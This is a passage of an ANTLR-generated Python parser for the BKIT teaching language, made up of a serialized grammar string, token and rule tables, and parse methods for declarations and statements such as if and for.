buf.write(\"\\2\\u015a\\u015b\\7\\67\\2\\2\\u015b\\u015c\\58\\35\\2\\u015c\\u015e\")\n buf.write(\"\\3\\2\\2\\2\\u015d\\u0154\\3\\2\\2\\2\\u015d\\u0158\\3\\2\\2\\2\\u015e\")\n buf.write(\"9\\3\\2\\2\\2\\u015f\\u0160\\7\\3\\2\\2\\u0160\\u0161\\7>\\2\\2\\u0161\")\n buf.write(\"\\u0162\\5> \\2\\u0162;\\3\\2\\2\\2\\u0163\\u0164\\t\\7\\2\\2\\u0164\")\n buf.write(\"=\\3\\2\\2\\2\\u0165\\u0174\\78\\2\\2\\u0166\\u0169\\5<\\37\\2\\u0167\")\n buf.write(\"\\u0169\\5> \\2\\u0168\\u0166\\3\\2\\2\\2\\u0168\\u0167\\3\\2\\2\\2\\u0169\")\n 
buf.write(\"\\u0171\\3\\2\\2\\2\\u016a\\u016d\\7=\\2\\2\\u016b\\u016e\\5<\\37\\2\")\n buf.write(\"\\u016c\\u016e\\5> \\2\\u016d\\u016b\\3\\2\\2\\2\\u016d\\u016c\\3\\2\")\n buf.write(\"\\2\\2\\u016e\\u0170\\3\\2\\2\\2\\u016f\\u016a\\3\\2\\2\\2\\u0170\\u0173\")\n buf.write(\"\\3\\2\\2\\2\\u0171\\u016f\\3\\2\\2\\2\\u0171\\u0172\\3\\2\\2\\2\\u0172\")\n buf.write(\"\\u0175\\3\\2\\2\\2\\u0173\\u0171\\3\\2\\2\\2\\u0174\\u0168\\3\\2\\2\\2\")\n buf.write(\"\\u0174\\u0175\\3\\2\\2\\2\\u0175\\u0176\\3\\2\\2\\2\\u0176\\u0177\\7\")\n buf.write(\"9\\2\\2\\u0177?\\3\\2\\2\\2\\u0178\\u017b\\5D#\\2\\u0179\\u017b\\5B\")\n buf.write(\"\\\"\\2\\u017a\\u0178\\3\\2\\2\\2\\u017a\\u0179\\3\\2\\2\\2\\u017b\\u0183\")\n buf.write(\"\\3\\2\\2\\2\\u017c\\u017f\\7=\\2\\2\\u017d\\u0180\\5D#\\2\\u017e\\u0180\")\n buf.write(\"\\5B\\\"\\2\\u017f\\u017d\\3\\2\\2\\2\\u017f\\u017e\\3\\2\\2\\2\\u0180\")\n buf.write(\"\\u0182\\3\\2\\2\\2\\u0181\\u017c\\3\\2\\2\\2\\u0182\\u0185\\3\\2\\2\\2\")\n buf.write(\"\\u0183\\u0181\\3\\2\\2\\2\\u0183\\u0184\\3\\2\\2\\2\\u0184A\\3\\2\\2\")\n buf.write(\"\\2\\u0185\\u0183\\3\\2\\2\\2\\u0186\\u018a\\7\\3\\2\\2\\u0187\\u0188\")\n buf.write(\"\\7\\66\\2\\2\\u0188\\u0189\\7\\4\\2\\2\\u0189\\u018b\\7\\67\\2\\2\\u018a\")\n buf.write(\"\\u0187\\3\\2\\2\\2\\u018b\\u018c\\3\\2\\2\\2\\u018c\\u018a\\3\\2\\2\\2\")\n buf.write(\"\\u018c\\u018d\\3\\2\\2\\2\\u018d\\u0190\\3\\2\\2\\2\\u018e\\u0190\\7\")\n buf.write(\"\\3\\2\\2\\u018f\\u0186\\3\\2\\2\\2\\u018f\\u018e\\3\\2\\2\\2\\u0190\\u0191\")\n buf.write(\"\\3\\2\\2\\2\\u0191\\u0194\\7>\\2\\2\\u0192\\u0195\\5> \\2\\u0193\\u0195\")\n buf.write(\"\\5<\\37\\2\\u0194\\u0192\\3\\2\\2\\2\\u0194\\u0193\\3\\2\\2\\2\\u0195\")\n buf.write(\"C\\3\\2\\2\\2\\u0196\\u019a\\7\\3\\2\\2\\u0197\\u0198\\7\\66\\2\\2\\u0198\")\n buf.write(\"\\u0199\\7\\4\\2\\2\\u0199\\u019b\\7\\67\\2\\2\\u019a\\u0197\\3\\2\\2\")\n buf.write(\"\\2\\u019b\\u019c\\3\\2\\2\\2\\u019c\\u019a\\3\\2\\2\\2\\u019c\\u019d\")\n 
buf.write(\"\\3\\2\\2\\2\\u019d\\u01a0\\3\\2\\2\\2\\u019e\\u01a0\\7\\3\\2\\2\\u019f\")\n buf.write(\"\\u0196\\3\\2\\2\\2\\u019f\\u019e\\3\\2\\2\\2\\u01a0E\\3\\2\\2\\2\\u01a1\")\n buf.write(\"\\u01a6\\7\\3\\2\\2\\u01a2\\u01a3\\7\\66\\2\\2\\u01a3\\u01a4\\5 \\21\")\n buf.write(\"\\2\\u01a4\\u01a5\\7\\67\\2\\2\\u01a5\\u01a7\\3\\2\\2\\2\\u01a6\\u01a2\")\n buf.write(\"\\3\\2\\2\\2\\u01a7\\u01a8\\3\\2\\2\\2\\u01a8\\u01a6\\3\\2\\2\\2\\u01a8\")\n buf.write(\"\\u01a9\\3\\2\\2\\2\\u01a9G\\3\\2\\2\\2\\u01aa\\u01ab\\5F$\\2\\u01ab\")\n buf.write(\"\\u01ac\\7>\\2\\2\\u01ac\\u01ad\\5> \\2\\u01adI\\3\\2\\2\\2\\u01ae\\u01af\")\n buf.write(\"\\7\\3\\2\\2\\u01af\\u01b0\\7>\\2\\2\\u01b0\\u01b1\\5<\\37\\2\\u01b1\")\n buf.write(\"K\\3\\2\\2\\2\\u01b2\\u01b7\\5D#\\2\\u01b3\\u01b4\\7=\\2\\2\\u01b4\\u01b6\")\n buf.write(\"\\5D#\\2\\u01b5\\u01b3\\3\\2\\2\\2\\u01b6\\u01b9\\3\\2\\2\\2\\u01b7\\u01b5\")\n buf.write(\"\\3\\2\\2\\2\\u01b7\\u01b8\\3\\2\\2\\2\\u01b8M\\3\\2\\2\\2\\u01b9\\u01b7\")\n buf.write(\"\\3\\2\\2\\2,SYhqw\\u0082\\u0088\\u009e\\u00ab\\u00b0\\u00d6\\u00e6\")\n buf.write(\"\\u00eb\\u00f2\\u00f9\\u0103\\u010e\\u0119\\u011f\\u0124\\u0128\")\n buf.write(\"\\u0131\\u0135\\u013c\\u0141\\u014a\\u014f\\u015d\\u0168\\u016d\")\n buf.write(\"\\u0171\\u0174\\u017a\\u017f\\u0183\\u018c\\u018f\\u0194\\u019c\")\n buf.write(\"\\u019f\\u01a8\\u01b7\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"'Body'\", \"'Break'\", \"'Continue'\", \n \"'Do'\", \"'Else'\", \"'ElseIf'\", \"'EndIf'\", \"'EndBody'\", \n \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \"'If'\", \n \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", 
\"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \n \"'-.'\", \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \n \"'&&'\", \"'||'\", \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \n \"'>='\", \"'=/='\", \"'<.'\", \"'>.'\", \"'<=.'\", \"'>=.'\", \n \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \n \"';'\", \"','\", \"'='\", \"'\\\"'\", \"'int_of_float'\", \"'int_of_string'\", \n \"'float_to_int'\", \"'float_of_string'\", \"'bool_of_string'\", \n \"'string_of_bool'\", \"'string_of_int'\", \"'string_of_float'\" ]\n\n symbolicNames = [ \"<INVALID>\", \"ID\", \"INT_LIT\", \"FLOAT_LIT\", \"BOOL_LIT\", \n \"STRING_LIT\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \n \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \n \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \n \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \n \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \n \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \n \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \n \"DOUBLE_QUOTE\", \"INT_OF_FLOAT\", \"INT_OF_STRING\", \"FLOAT_TO_INT\", \n \"FLOAT_OF_STRING\", \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \n \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \"COMMENT\", \"WS\", \n \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_stmt_list = 3\n RULE_stmt = 4\n RULE_if_stmt = 5\n RULE_var_declare_stmt = 6\n RULE_for_stmt = 7\n RULE_while_stmt = 8\n RULE_dowhile_stmt = 9\n RULE_assign_stmt 
= 10\n RULE_break_stmt = 11\n RULE_continue_stmt = 12\n RULE_call_stmt = 13\n RULE_return_stmt = 14\n RULE_expr = 15\n RULE_expr1 = 16\n RULE_expr2 = 17\n RULE_expr3 = 18\n RULE_expr4 = 19\n RULE_expr5 = 20\n RULE_expr6 = 21\n RULE_array_cell = 22\n RULE_expr7 = 23\n RULE_expr8 = 24\n RULE_operand = 25\n RULE_function_call = 26\n RULE_index_op = 27\n RULE_array = 28\n RULE_primitive_data = 29\n RULE_array_lit = 30\n RULE_var_list = 31\n RULE_var_init = 32\n RULE_var_non_init = 33\n RULE_composite_var = 34\n RULE_composite_init = 35\n RULE_primitive_init = 36\n RULE_params_list = 37\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"stmt_list\", \n \"stmt\", \"if_stmt\", \"var_declare_stmt\", \"for_stmt\", \"while_stmt\", \n \"dowhile_stmt\", \"assign_stmt\", \"break_stmt\", \"continue_stmt\", \n \"call_stmt\", \"return_stmt\", \"expr\", \"expr1\", \"expr2\", \n \"expr3\", \"expr4\", \"expr5\", \"expr6\", \"array_cell\", \"expr7\", \n \"expr8\", \"operand\", \"function_call\", \"index_op\", \"array\", \n \"primitive_data\", \"array_lit\", \"var_list\", \"var_init\", \n \"var_non_init\", \"composite_var\", \"composite_init\", \"primitive_init\", \n \"params_list\" ]\n\n EOF = Token.EOF\n ID=1\n INT_LIT=2\n FLOAT_LIT=3\n BOOL_LIT=4\n STRING_LIT=5\n BODY=6\n BREAK=7\n CONTINUE=8\n DO=9\n ELSE=10\n ELSEIF=11\n ENDIF=12\n ENDBODY=13\n ENDFOR=14\n ENDWHILE=15\n FOR=16\n FUNCTION=17\n IF=18\n PARAMETER=19\n RETURN=20\n THEN=21\n VAR=22\n WHILE=23\n TRUE=24\n FALSE=25\n ENDDO=26\n PLUS_INT=27\n PLUS_FLOAT=28\n MINUS_INT=29\n MINUS_FLOAT=30\n STAR_INT=31\n STAR_FLOAT=32\n DIV_INT=33\n DIV_FLOAT=34\n MOD=35\n NOT=36\n AND=37\n OR=38\n EQUAL=39\n NOT_EQUAL_INT=40\n LESS_INT=41\n GREATER_INT=42\n LESS_OR_EQUAL_INT=43\n GREATER_OR_EQUAL_INT=44\n NOT_EQUAL_FLOAT=45\n LESS_FLOAT=46\n GREATER_FLOAT=47\n LESS_OR_EQUAL_FLOAT=48\n GREATER_OR_EQUAL_FLOAT=49\n LEFT_PAREN=50\n RIGHT_PAREN=51\n LEFT_BRACKET=52\n RIGHT_BRACKET=53\n LEFT_BRACE=54\n RIGHT_BRACE=55\n 
COLON=56\n DOT=57\n SEMI=58\n COMMA=59\n ASSIGN=60\n DOUBLE_QUOTE=61\n INT_OF_FLOAT=62\n INT_OF_STRING=63\n FLOAT_TO_INT=64\n FLOAT_OF_STRING=65\n BOOL_OF_STRING=66\n STRING_OF_BOOL=67\n STRING_OF_INT=68\n STRING_OF_FLOAT=69\n COMMENT=70\n WS=71\n ILLEGAL_ESCAPE=72\n UNCLOSE_STRING=73\n UNTERMINATED_COMMENT=74\n ERROR_CHAR=75\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitProgram\" ):\n return visitor.visitProgram(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 81\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 76\n self.var_declare()\n 
self.state = 77\n self.match(BKITParser.SEMI)\n self.state = 83\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 87\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.FUNCTION:\n self.state = 84\n self.function_declare()\n self.state = 89\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 90\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def COLON(self):\n return self.getToken(BKITParser.COLON, 0)\n\n def var_list(self):\n return self.getTypedRuleContext(BKITParser.Var_listContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_declare\" ):\n return visitor.visitVar_declare(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 92\n self.match(BKITParser.VAR)\n self.state = 93\n self.match(BKITParser.COLON)\n self.state = 94\n self.var_list()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FUNCTION(self):\n 
return self.getToken(BKITParser.FUNCTION, 0)\n\n def COLON(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COLON)\n else:\n return self.getToken(BKITParser.COLON, i)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def BODY(self):\n return self.getToken(BKITParser.BODY, 0)\n\n def ENDBODY(self):\n return self.getToken(BKITParser.ENDBODY, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def PARAMETER(self):\n return self.getToken(BKITParser.PARAMETER, 0)\n\n def params_list(self):\n return self.getTypedRuleContext(BKITParser.Params_listContext,0)\n\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitFunction_declare\" ):\n return visitor.visitFunction_declare(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 96\n self.match(BKITParser.FUNCTION)\n self.state = 97\n self.match(BKITParser.COLON)\n self.state = 98\n self.match(BKITParser.ID)\n self.state = 102\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.PARAMETER:\n self.state = 99\n self.match(BKITParser.PARAMETER)\n self.state = 100\n 
self.match(BKITParser.COLON)\n self.state = 101\n self.params_list()\n\n\n self.state = 104\n self.match(BKITParser.BODY)\n self.state = 105\n self.match(BKITParser.COLON)\n self.state = 111\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 106\n self.var_declare_stmt()\n self.state = 107\n self.match(BKITParser.SEMI)\n self.state = 113\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 117\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.BREAK) | (1 << BKITParser.CONTINUE) | (1 << BKITParser.DO) | (1 << BKITParser.FOR) | (1 << BKITParser.IF) | (1 << BKITParser.RETURN) | (1 << BKITParser.WHILE) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 114\n self.stmt()\n self.state = 119\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 120\n self.match(BKITParser.ENDBODY)\n self.state = 121\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Stmt_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return 
self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt_list\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitStmt_list\" ):\n return visitor.visitStmt_list(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def stmt_list(self):\n\n localctx = BKITParser.Stmt_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_stmt_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 128\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 123\n self.var_declare_stmt()\n self.state = 124\n self.match(BKITParser.SEMI)\n self.state = 130\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 134\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,6,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n self.state = 131\n self.stmt() \n self.state = 136\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,6,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def if_stmt(self):\n return self.getTypedRuleContext(BKITParser.If_stmtContext,0)\n\n\n def for_stmt(self):\n return self.getTypedRuleContext(BKITParser.For_stmtContext,0)\n\n\n def while_stmt(self):\n return self.getTypedRuleContext(BKITParser.While_stmtContext,0)\n\n\n def dowhile_stmt(self):\n return self.getTypedRuleContext(BKITParser.Dowhile_stmtContext,0)\n\n\n def assign_stmt(self):\n return 
self.getTypedRuleContext(BKITParser.Assign_stmtContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def break_stmt(self):\n return self.getTypedRuleContext(BKITParser.Break_stmtContext,0)\n\n\n def continue_stmt(self):\n return self.getTypedRuleContext(BKITParser.Continue_stmtContext,0)\n\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def return_stmt(self):\n return self.getTypedRuleContext(BKITParser.Return_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitStmt\" ):\n return visitor.visitStmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def stmt(self):\n\n localctx = BKITParser.StmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_stmt)\n try:\n self.state = 156\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,7,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 137\n self.if_stmt()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 138\n self.for_stmt()\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 139\n self.while_stmt()\n pass\n\n elif la_ == 4:\n self.enterOuterAlt(localctx, 4)\n self.state = 140\n self.dowhile_stmt()\n pass\n\n elif la_ == 5:\n self.enterOuterAlt(localctx, 5)\n self.state = 141\n self.assign_stmt()\n self.state = 142\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 6:\n self.enterOuterAlt(localctx, 6)\n self.state = 144\n self.break_stmt()\n self.state = 145\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 7:\n self.enterOuterAlt(localctx, 7)\n self.state = 147\n self.continue_stmt()\n self.state = 148\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 8:\n self.enterOuterAlt(localctx, 8)\n self.state = 150\n self.call_stmt()\n self.state = 151\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 9:\n 
self.enterOuterAlt(localctx, 9)\n self.state = 153\n self.return_stmt()\n self.state = 154\n self.match(BKITParser.SEMI)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class If_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def IF(self):\n return self.getToken(BKITParser.IF, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def THEN(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.THEN)\n else:\n return self.getToken(BKITParser.THEN, i)\n\n def stmt_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Stmt_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,i)\n\n\n def ENDIF(self):\n return self.getToken(BKITParser.ENDIF, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def ELSEIF(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.ELSEIF)\n else:\n return self.getToken(BKITParser.ELSEIF, i)\n\n def ELSE(self):\n return self.getToken(BKITParser.ELSE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_if_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitIf_stmt\" ):\n return visitor.visitIf_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def if_stmt(self):\n\n localctx = BKITParser.If_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_if_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 158\n self.match(BKITParser.IF)\n self.state = 159\n self.expr()\n self.state = 160\n 
self.match(BKITParser.THEN)\n self.state = 161\n self.stmt_list()\n self.state = 169\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.ELSEIF:\n self.state = 162\n self.match(BKITParser.ELSEIF)\n self.state = 163\n self.expr()\n self.state = 164\n self.match(BKITParser.THEN)\n self.state = 165\n self.stmt_list()\n self.state = 171\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 174\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.ELSE:\n self.state = 172\n self.match(BKITParser.ELSE)\n self.state = 173\n self.stmt_list()\n\n\n self.state = 176\n self.match(BKITParser.ENDIF)\n self.state = 177\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declare_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare(self):\n return self.getTypedRuleContext(BKITParser.Var_declareContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_declare_stmt\" ):\n return visitor.visitVar_declare_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_declare_stmt(self):\n\n localctx = BKITParser.Var_declare_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_var_declare_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 179\n self.var_declare()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class For_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, 
parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FOR(self):\n return self.getToken(BKITParser.FOR, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDFOR(self):\n return self.getToken(BKITParser.ENDFOR, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_for_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitFor_stmt\" ):\n return visitor.visitFor_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def for_stmt(self):\n\n localctx = BKITParser.For_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_for_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 181\n self.match(BKITParser.FOR)\n self.state = 182\n self.match(BKITParser.LEFT_PAREN)\n self.state = 183\n self.match(BKITParser.ID)\n self.state = 184\n 